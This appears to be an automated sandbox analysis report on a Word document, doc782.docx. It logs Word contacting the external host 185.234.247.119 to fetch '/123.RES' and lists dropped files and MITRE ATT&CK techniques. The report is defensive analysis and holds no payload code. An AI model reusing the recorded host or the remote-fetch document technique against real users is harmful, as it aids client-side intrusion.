Jun 7, 2022 18:38:14.250871897 CEST	6	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Content-Type: application/octet-stream Content-Length: 6241 Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861" Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65 Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
Jun 7, 2022 18:38:14.639050961 CEST	12	OUT	HEAD /123.RES HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 185.234.247.119 Content-Length: 0 Connection: Keep-Alive
Jun 7, 2022 18:38:14.674964905 CEST	12	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Content-Type: application/octet-stream Content-Length: 6241 Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861" Accept-Ranges: bytes
Jun 7, 2022 18:38:14.681684017 CEST	12	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 185.234.247.119 Content-Length: 0 Connection: Keep-Alive
Jun 7, 2022 18:38:14.709424973 CEST	13	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 18:38:14.802052975 CEST	14	OUT	GET /123.RES HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.234.247.119 If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT If-None-Match: "6299dd5d-1861" Connection: Keep-Alive
Jun 7, 2022 18:38:14.829963923 CEST	14	IN	HTTP/1.1 304 Not Modified Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861"
Jun 7, 2022 18:38:15.016185045 CEST	15	OUT	HEAD /123.RES HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 185.234.247.119 Content-Length: 0 Connection: Keep-Alive
Jun 7, 2022 18:38:15.044190884 CEST	15	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 16:38:15 GMT Content-Type: application/octet-stream Content-Length: 6241 Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49174	185.234.247.119	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 18:38:10.132050991 CEST	3	OUT	HEAD /123.RES HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 185.234.247.119
Jun 7, 2022 18:38:10.160626888 CEST	3	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 16:38:10 GMT Content-Type: application/octet-stream Content-Length: 6241 Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861" Accept-Ranges: bytes
Jun 7, 2022 18:38:10.388240099 CEST	3	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 16:38:10 GMT Content-Type: application/octet-stream Content-Length: 6241 Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861" Accept-Ranges: bytes
Jun 7, 2022 18:38:14.734277010 CEST	13	OUT	HEAD /123.RES HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 185.234.247.119
Jun 7, 2022 18:38:14.762449980 CEST	13	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Content-Type: application/octet-stream Content-Length: 6241 Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861" Accept-Ranges: bytes
Jun 7, 2022 18:38:14.990220070 CEST	14	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Content-Type: application/octet-stream Content-Length: 6241 Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT Connection: keep-alive ETag: "6299dd5d-1861" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49175	185.234.247.119	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 18:38:14.141001940 CEST	4	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 185.234.247.119
Jun 7, 2022 18:38:14.171741962 CEST	4	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 18:38:14.401310921 CEST	12	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Tue, 07 Jun 2022 16:38:14 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	18:38:14
Start date:	07/06/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f7c0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report doc782.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{950185C1-D03B-43EE-9B9C-D0CDFF898355}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{74F2B178-00AE-424F-83E7-BA599E828254}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{93886B29-9649-4D5E-975D-770BA1081A48}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E4F5B659-EE23-4A39-84D5-F59507B69C67}.tmp

C:\Users\user\AppData\Local\Temp\{81AEC75A-0A9E-4A32-B5F6-541A0FA08477}

C:\Users\user\AppData\Local\Temp\{ACD4BEAE-F768-48FA-AC51-627BB9420B93}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$doc782.docx

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
doc782.docx